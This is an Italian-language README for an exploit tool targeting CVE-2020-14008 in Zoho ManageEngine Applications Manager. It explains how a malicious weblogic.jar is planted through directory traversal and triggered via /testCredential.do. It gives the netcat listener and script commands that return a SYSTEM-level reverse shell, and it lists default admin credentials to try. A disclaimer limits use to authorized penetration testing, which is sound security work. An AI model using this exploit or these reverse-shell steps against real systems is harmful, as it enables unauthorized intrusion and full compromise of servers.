
CVE-2020-14008 - ManageEngine Applications Manager RCE
Esecuzione di codice remota autenticata tramite caricamento arbitrario di file in Zoho ManageEngine Applications Manager (versioni <= 14720).
| Dettaglio | Valore |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (Alta) |
| Tipo | RCE autenticata / Caricamento arbitrario di file |
| Prodotto | Zoho ManageEngine Applications Manager |
| Versioni affette | Versione 14720 e precedenti |
| Requisito | Credenziali di amministratore valide |
| Risultato | Reverse shell a livello di sistema (SYSTEM) |
Lo sfruttamento abusa della funzionalità di test delle credenziali del monitor Weblogic. Un amministratore autenticato carica un file weblogic.jar malevolo nel percorso della libreria Weblogic previsto. Quando il test delle credenziali viene attivato, ManageEngine carica weblogic.jndi.Environment dal JAR caricato tramite JarLoader.loadClass() e newInstance(), eseguendo codice Java arbitrario.
javac e jar nel PATH)nc (netcat) per catturare la reverse shellpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# Base
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) contenente una reverse shell in weblogic.jarclasses/weblogic/version8/ tramite directory traversal (fallback: crea un'operazione pianificata per spostarlo)/testCredential.do, che carica e istanzia la classe malevola| Nome utente | Password |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| Errore | Soluzione |
|---|---|
release version 7 not supported | Java 21+ ha abbandonato il target Java 7. Lo script usa --release 8 |
FileNotFoundError: weblogic.jar | Compilazione del JAR fallita. Verifica che javac e jar siano nel PATH |
No valid response from used session | Credenziali non valide |
Actionname not found | Creazione dell'operazione fallita, verifica i permessi di amministratore |
Questo strumento è fornito esclusivamente per test di penetrazione autorizzati e ricerca sulla sicurezza. L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha il permesso di testare è illegale.